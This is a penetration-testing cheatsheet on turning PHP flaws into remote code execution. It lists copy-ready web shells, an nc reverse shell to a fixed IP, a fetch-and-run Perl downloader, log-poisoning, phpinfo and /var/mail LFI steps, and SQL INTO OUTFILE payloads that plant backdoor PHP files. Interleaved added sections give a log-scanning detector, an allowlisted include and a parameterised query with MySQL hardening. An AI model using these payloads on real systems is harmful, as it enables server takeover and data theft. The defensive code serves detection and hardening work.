# PHP RCE

### PHP SYSTEM/SHELL_EXEC

```php
<?php echo shell_exec($_GET['cmd']); ?>
<?php echo system($_REQUEST['hack']); ?>
<?php system($_GET['hack']); ?>

<?php /* RFI: hard-coded reverse shell instead of a parameter */ system('nc.exe -v 10.11.0.131 4444 -e cmd.exe'); ?>
```

### FreeBSD wget reverse shell

*There's no `wget` in BSD, so use `fetch`.*

```php
<?php passthru("mkdir /tmp/temp/ && fetch -qo /tmp/temp/callme.pl http://10.11.0.69/callme.pl && perl /tmp/temp/callme.pl"); ?>
```

### Log poisoning LFI RCE

1. Using Burp, inject PHP code into the User-Agent header: `User-Agent: <?php system($_REQUEST['hack']); ?>`
2. Check that the request landed in the log at `/var/log/httpd-access.log`
3. Use the LFI to include the log and reach RCE: `10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&hack=uname`
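Both halves of the technique above leave traces in the same access log: the poisoned User-Agent, then a request whose `file=` parameter points at the log itself. The PHP CLI script below is an added example (not from the original page or any project it mentions) that flags both on combined-format log lines; the three sample lines, IPs and paths are constructed for the example.

```php
<?php
// Added example: scan Apache/nginx combined-format access-log lines for
// PHP code injected into the User-Agent or Referer field, and for requests
// that try to include a log file through an LFI parameter.
// The log lines below are constructed samples, not real traffic.

$sampleLog = <<<'LOG'
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /browse.php?file=about HTTP/1.1" 200 231 "-" "<?php system($_REQUEST['hack']); ?>"
10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&hack=uname HTTP/1.1" 200 9812 "-" "curl/8.4.0"
LOG;

// Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
const LOG_PATTERN = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/';

// PHP open tags or shell-execution functions inside a header value.
const CODE_PATTERN = '/<\?(php|=)|\b(system|shell_exec|passthru|exec|eval)\s*\(/i';

// Request path (after URL-decoding) that points at a log file.
const LOG_READ_PATTERN = '#(/var/log/|access[_.-]?log|error[_.-]?log)#i';

function analyseLine(string $line): ?array
{
    if (!preg_match(LOG_PATTERN, $line, $m)) {
        return null;   // not a combined-format line, skip it
    }
    [, $ip, $time, $request, , , $referer, $ua] = $m;

    $findings = [];
    foreach (['user-agent' => $ua, 'referer' => $referer] as $field => $value) {
        if (preg_match(CODE_PATTERN, $value)) {
            $findings[] = "php code in $field";
        }
    }
    // Decode %2F-style encoding so an encoded /var/log/... path is still caught.
    if (preg_match(LOG_READ_PATTERN, urldecode($request))) {
        $findings[] = 'request includes a log file path';
    }

    return $findings ? ['ip' => $ip, 'time' => $time, 'findings' => $findings] : null;
}

foreach (explode("\n", $sampleLog) as $line) {
    if ($hit = analyseLine($line)) {
        printf("%s %s: %s\n", $hit['time'], $hit['ip'], implode('; ', $hit['findings']));
    }
}
```

Run with `php scan.php` (file name assumed); on the constructed input the first line is silent, the second is reported for PHP code in the User-Agent, and the third for a log-file path in the request. The same two rules translate directly into a WAF or SIEM correlation: a source that does both within a short window is the log-poisoning pattern, not a scanner false positive.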

### PHPINFO LFI RCE

You have an LFI and can view phpinfo.php, and `file_uploads` is turned on.

![file_uploads = On](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FTfCqHFXTWGVowhhhzxF2%2Ffile.png?alt=media)

(Step 1) `wget` the script: [`https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/File%20Inclusion/phpinfolfi.py`](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/File%20Inclusion/phpinfolfi.py)

(Step 2) Modify the payload to include Pentest Monkey's reverse shell between the start and end markers

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FHTX4ztFOHrFBkBcXVW8s%2Ffile.png?alt=media)

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FSkE8LQsYzm2Uvi1D4vwb%2Ffile.png?alt=media)

If the script doesn't work, check the greater-than comparison operator at the two places below.

At line 203

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FqQg74m3Wfe8RnlMn5Vbz%2Ffile.png?alt=media)

At line 262

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2Fa8zlCnHbjYVEzsv3FHxv%2Ffile.png?alt=media)

(Step 3) Update the LFI URL in the script (append a `%00` null-byte terminator if needed). Note that the request is a Python format string, so the percent sign is doubled: `%%00`.

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FA4a5WAzvayoqw64bwpaR%2Ffile.png?alt=media)

(Step 4) Start an `nc` listener to catch the reverse shell and run the Python script.

`python phpinfolfi.py 10.10.10.84 80 100`

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FQKtiSG1cWCM9l5YhuTfP%2Ffile.png?alt=media)

### LFI RCE using /var/mail

See the SMTP cheatsheet; send an email whose body is the payload below:

`<?php echo system($_REQUEST['hack']); ?>`

Using Burp Suite, trigger the RCE through the LFI with a request such as:

`../var/mail/emailUserName..........&hack=whoami`

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LzoLyb83qrgLVzBgfMJ%2Fuploads%2FIQL81g4Dn0PBMvdelBRx%2Ffile.png?alt=media)
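The three LFI-to-RCE sections above (log poisoning, phpinfo temp files, `/var/mail`) all rest on the same defect: the `file=` parameter is passed to `include` as a path. The snippet below is an added example, not code from the original page or any project it mentions; it shows that vulnerable shape next to an allowlisted version. The file name `browse.php` and the `pages/` directory are assumptions. Independent of the code, `allow_url_include=Off` (the default) blocks the RFI variant and `open_basedir` limits which directories an include can reach at all.

```php
<?php
// Added example: the include behind an LFI, beside a hardened version.
// "browse.php" and the "pages/" directory are assumed names.

// Vulnerable: whatever arrives in ?file= is handed to include(), so
// /var/log/httpd-access.log, /var/mail/<user> or an uploaded temp file
// are all reachable.
function renderPageVulnerable(string $file): void
{
    include $file;
}

// Hardened: the parameter is a key into a fixed table, never a path.
// Anything outside the table is a 404 and is logged for the SOC.
const PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
    'help'  => 'help.php',
];

function resolvePage(string $name, string $baseDir): ?string
{
    if (!isset(PAGES[$name])) {
        return null;
    }
    // Belt and braces: even a table entry is resolved and checked to still
    // live under $baseDir after symlinks are expanded.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$name]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function renderPageHardened(string $name, string $baseDir): void
{
    $path = resolvePage($name, $baseDir);
    if ($path === null) {
        // Truncate before logging so the log line itself stays small and
        // cannot be used to stuff more payload into error_log.
        error_log('rejected page parameter: ' . substr($name, 0, 200));
        http_response_code(404);
        echo 'Not found';
        return;
    }
    include $path;
}

// Usage in browse.php (assumed file name). $_GET values can be arrays,
// so the type is checked before the string-typed function is called.
$name = $_GET['file'] ?? 'home';
renderPageHardened(is_string($name) ? $name : '', __DIR__ . '/pages');
```

The rejection branch is what a detection engineer wants: every `file=/var/log/...`, `file=/var/mail/...` or `file=/tmp/php...` attempt now produces one `rejected page parameter` line in the PHP error log instead of an inclusion.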

### MySQL: writing a PHP reverse-shell downloader with wget

```sql
select "<?php shell_exec('wget http://10.10.14.4/php-reverse-shell.php -O shell1.php'); ?>" into outfile "/var/www/html/dlexp.php";
```

### SQL Code Execution

```sql
-- to upload
select "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php";
```

### SQL Create file using INTO OUTFILE

Injected through a vulnerable `id` parameter (URL, not a bare SQL statement):

```text
10.11.1.35/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
```
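The three `INTO OUTFILE` payloads above need two things at once: a query built by string concatenation, and a database account holding the `FILE` privilege on a server whose `secure_file_priv` allows writing under the web root. The snippet below is an added example, not code from the original page or any project it mentions, showing the `comment.php?id=` endpoint with a parameterised query; the DSN, credentials, `app_ro` account and `comments` table are assumptions.

```php
<?php
// Added example: comment.php?id= with a prepared statement, so that the id
// value can never extend the statement with UNION ... INTO OUTFILE.
// DSN, credentials, the app_ro account and the comments table are assumed.

function connect(): PDO
{
    return new PDO('mysql:host=127.0.0.1;dbname=app;charset=utf8mb4', 'app_ro', 'CHANGEME', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares, not client-side quoting
    ]);
}

// Vulnerable shape (what the payload above relies on):
//   $rows = $pdo->query("SELECT id, author, body FROM comments WHERE id = " . $_GET['id']);

// Hardened: validate the type first, then bind; the server only ever sees
// one integer parameter, never SQL text from the client.
function fetchComment(PDO $pdo, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;   // "738 union all select ..." fails here, before any query
    }
    $stmt = $pdo->prepare('SELECT id, author, body FROM comments WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Server-side guard rail, run once as a DBA (account name assumed):
//   REVOKE FILE ON *.* FROM 'app_ro'@'localhost';
//   SHOW VARIABLES LIKE 'secure_file_priv';
// secure_file_priv should name a directory outside the web root, or be NULL
// to disable INTO OUTFILE entirely; mysqld's OS user must also not be able to
// write into the document root.

$pdo = connect();
$comment = fetchComment($pdo, $_GET['id'] ?? '');
header('Content-Type: application/json');
echo json_encode($comment ?? ['error' => 'not found']);
```

Even if the application layer is fixed, the `REVOKE FILE` and `secure_file_priv` checks are worth running on any MySQL/XAMPP host: they are what stops a future injection somewhere else in the code from turning into a file write under `htdocs`.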
